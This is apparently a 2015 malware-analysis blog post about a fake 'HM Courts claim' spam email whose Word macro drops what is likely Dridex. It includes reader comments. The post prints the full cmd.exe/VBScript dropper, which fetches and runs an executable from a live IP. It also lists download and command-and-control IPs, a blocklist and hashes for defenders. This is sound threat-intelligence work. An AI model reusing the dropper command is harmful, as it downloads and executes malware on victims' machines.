Sponsored by..

Tuesday, 7 April 2015

Malware spam: "COMPANY NAME has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]"

This fake legal spam comes with a malicious attachment:

From:    Isiah Mosley [Rosella.e6@customer.7starnet.com]
Date:    7 April 2015 at 14:09
Subject:    Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]

Schroders,Isiah Mosley

The company name is randomly chose. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro [pastebin] which executes the following command:
cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://185.39.149.178/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo    .type = 1 >>gyuFYFGuig.vbs & @echo     .open>>gyuFYFGuig.vbs & @echo     .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo     .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs
I can't be bothered to work out all of the crap with the .vbs which may of may not be importance. Along with an alternate macro, I can see download locations from:

http://185.39.149.178/aszxmy/image04.gif
http://148.251.87.253/aszxmy/image04.gif

For the record,  185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany.

The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56. Automated analysis tools [1] [2] [3] show the malware phoning home to:

151.252.48.36 (Vautron Serverhousing, Germany)

According to the Malwr report, it drops a DLL with a detection rate of 2/56 which is most likely a Dridex DLL.

Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178

MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0

4 comments:

Petehv2 said...

I opened this word doc on my iPhone could it be infected?

Conrad Longmore said...

@Petehv2 - even if you have Microsoft Office on your phone you should be safe, because it downloads a Windows executable that won't run on that platform.

Petehv2 said...

Thanks for your advice :)

Adam Massey said...

hello
we are detecting and labelling all macro containing documents.
the system we use does not detect based on virus signatures it detects based on if the document contains a macro or not
this one did not get labelled.
have you found any differences in the way the .doc file is constructed as we have ruled out a system fault.
we have seen a batch of this sent on 1/5/15. happy to provide more specific info if you leave an email address